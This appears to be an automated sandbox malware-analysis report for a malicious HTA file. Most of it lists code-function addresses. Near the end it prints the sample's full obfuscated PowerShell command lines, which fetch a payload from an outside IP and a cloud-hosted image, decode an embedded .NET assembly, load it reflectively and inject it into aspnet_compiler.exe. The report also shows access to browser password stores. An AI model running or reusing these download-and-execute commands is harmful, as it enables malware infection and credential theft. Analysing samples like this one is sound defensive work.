                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01846BD712_2_01846BD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017CDBF912_2_017CDBF9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184AB4012_2_0184AB40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184FB7612_2_0184FB76
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AFB8012_2_017AFB80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0182DAAC12_2_0182DAAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0183DAC612_2_0183DAC6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01847A4612_2_01847A46
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184FA4912_2_0184FA49
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017D5AA012_2_017D5AA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01803A6C12_2_01803A6C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178EA8012_2_0178EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01793D4012_2_01793D40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179AD0012_2_0179AD00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178ADE012_2_0178ADE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AFDC012_2_017AFDC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A8DBF12_2_017A8DBF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01841D5A12_2_01841D5A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01847D7312_2_01847D73
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01830CB512_2_01830CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184FCF212_2_0184FCF2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790C0012_2_01790C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01780CF212_2_01780CF2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01809C3212_2_01809C32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184FFB112_2_0184FFB1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B0F3012_2_017B0F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017D2F2812_2_017D2F28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184FF0912_2_0184FF09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179CFE012_2_0179CFE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01782FC812_2_01782FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01804F4012_2_01804F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01791F9212_2_01791F92
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184CE9312_2_0184CE93
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790E5912_2_01790E59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184EEDB12_2_0184EEDB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184EE2612_2_0184EE26
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01799EB012_2_01799EB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A2E9012_2_017A2E90
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EFE4F616_2_04EFE4F6
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E4146016_2_04E41460
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0244616_2_04F02446
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0F43F16_2_04F0F43F
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EED5B016_2_04EED5B0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F1059116_2_04F10591
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0757116_2_04F07571
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E5053516_2_04E50535
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E6C6E016_2_04E6C6E0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F016CC16_2_04F016CC
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E4C7C016_2_04E4C7C0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0F7B016_2_04F0F7B0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E5077016_2_04E50770
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E7475016_2_04E74750
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0F0E016_2_04F0F0E0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F070E916_2_04F070E9
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EFF0CC16_2_04EFF0CC
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E570C016_2_04E570C0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F081CC16_2_04F081CC
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E5B1B016_2_04E5B1B0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F101AA16_2_04F101AA
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E8516C16_2_04E8516C
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E3F17216_2_04E3F172
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F1B16B16_2_04F1B16B
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E4010016_2_04E40100
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EEA11816_2_04EEA118
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EF12ED16_2_04EF12ED
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E6B2C016_2_04E6B2C0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E552A016_2_04E552A0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EF027416_2_04EF0274
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E5E3F016_2_04E5E3F0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F103E616_2_04F103E6
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E9739A16_2_04E9739A
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0A35216_2_04F0A352
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E3D34C16_2_04E3D34C
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0132D16_2_04F0132D
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0FCF216_2_04F0FCF2
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E40CF216_2_04E40CF2
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EF0CB516_2_04EF0CB5
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EC9C3216_2_04EC9C32
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E50C0016_2_04E50C00
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E4ADE016_2_04E4ADE0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E6FDC016_2_04E6FDC0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E68DBF16_2_04E68DBF
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F07D7316_2_04F07D73
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E53D4016_2_04E53D40
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F01D5A16_2_04F01D5A
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E5AD0016_2_04E5AD00
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0EEDB16_2_04F0EEDB
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E59EB016_2_04E59EB0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0CE9316_2_04F0CE93
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E62E9016_2_04E62E90
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E50E5916_2_04E50E59
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0EE2616_2_04F0EE26
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E5CFE016_2_04E5CFE0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E42FC816_2_04E42FC8
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0FFB116_2_04F0FFB1
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E51F9216_2_04E51F92
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EC4F4016_2_04EC4F40
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E92F2816_2_04E92F28
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E70F3016_2_04E70F30
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0FF0916_2_04F0FF09
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E538E016_2_04E538E0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E7E8F016_2_04E7E8F0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E368B816_2_04E368B8
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E5284016_2_04E52840
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E5A84016_2_04E5A840
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E529A016_2_04E529A0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F1A9A616_2_04F1A9A6
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E6696216_2_04E66962
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E5995016_2_04E59950
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E6B95016_2_04E6B950
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EFDAC616_2_04EFDAC6
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EEDAAC16_2_04EEDAAC
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E95AA016_2_04E95AA0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E4EA8016_2_04E4EA80
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EC3A6C16_2_04EC3A6C
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F07A4616_2_04F07A46
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0FA4916_2_04F0FA49
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E8DBF916_2_04E8DBF9
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F06BD716_2_04F06BD7
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E6FB8016_2_04E6FB80
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0FB7616_2_04F0FB76
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0AB4016_2_04F0AB40
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EB220016_2_02EB2200
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EAD34016_2_02EAD340
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EAB32016_2_02EAB320
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EAD12016_2_02EAD120
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EAB46616_2_02EAB466
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EAB47016_2_02EAB470
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EB3AA016_2_02EB3AA0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EB3A9B16_2_02EB3A9B
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EB58A016_2_02EB58A0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02ECBFA016_2_02ECBFA0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04D1E68E16_2_04D1E68E
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04D1D75816_2_04D1D758
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04D1E1D816_2_04D1E1D8
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04D1E2F716_2_04D1E2F7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0177B970 appears 266 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 017D7E54 appears 88 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 017C5130 appears 36 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0180F290 appears 105 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 017FEA12 appears 84 times
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: String function: 04E3B970 appears 266 times
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: String function: 04E97E54 appears 88 times
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: String function: 04EBEA12 appears 84 times
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: String function: 04ECF290 appears 105 times
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: String function: 04E85130 appears 36 times
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: Process Memory Space: powershell.exe PID: 6364, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winHTA@23/17@4/5
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nightridingisreallyniceforworkingskillentiretimefornew[1].tiffJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4080:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujoxousr.3r0.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS"
                      Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: msinfo32.exe, 00000010.00000003.2302605762.0000000003068000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2656376865.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000003.2305913626.0000000003095000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2656376865.0000000003089000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000003.2302767117.0000000003089000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: bestimylover.htaReversingLabs: Detection: 18%
                      Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\bestimylover.hta"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES66CD.tmp" "c:\Users\user\AppData\Local\Temp\hfoj0pnm\CSC102A1040D3F84A7CBD6AF35F51E7FDEF.TMP"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = 'JHNlcmVuYWRlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGZ1Z3VzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskYm94aWVyID0gJGZ1Z3VzLkRvd25sb2FkRGF0YSgkc2VyZW5hZGUpOyRwYXJ0aWN1bGFyaXplID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGJveGllcik7JHBsYWlubmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmF0dGxlYm94ZXMgPSAnPDxCQVNFNjRfRU5EPj4nOyRzdXBlcnByb2ZpdCA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHBsYWlubmVzcyk7JGNhbnRpbGxhdGluZyA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHJhdHRsZWJveGVzKTskc3VwZXJwcm9maXQgLWdlIDAgLWFuZCAkY2FudGlsbGF0aW5nIC1ndCAkc3VwZXJwcm9maXQ7JHN1cGVycHJvZml0ICs9ICRwbGFpbm5lc3MuTGVuZ3RoOyR1bmZyZWVkID0gJGNhbnRpbGxhdGluZyAtICRzdXBlcnByb2ZpdDskdmluY2FzID0gJHBhcnRpY3VsYXJpemUuU3Vic3RyaW5nKCRzdXBlcnByb2ZpdCwgJHVuZnJlZWQpOyRwcm9ib3NjaWRpYW4gPSAtam9pbiAoJHZpbmNhcy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkdmluY2FzLkxlbmd0aCldOyRrb21vbmRvciA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHByb2Jvc2NpZGlhbik7JG51cnNlcnltYW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRrb21vbmRvcik7JGdhcm5pZXJpdGUgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskZ2Fybmllcml0ZS5JbnZva2UoJG51bGwsIEAoJ3R4dC5GREdGUi80NDIvNTcxLjQ0LjI3MS43MDEvLzpwdHRoJywgJyRzYXlzdCcsICckc2F5c3QnLCAnJHNheXN0JywgJ2FzcG5ldF9jb21waWxlcicsICckc2F5c3QnLCAnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnMScsJyRzYXlzdCcpKTs=';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongs
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
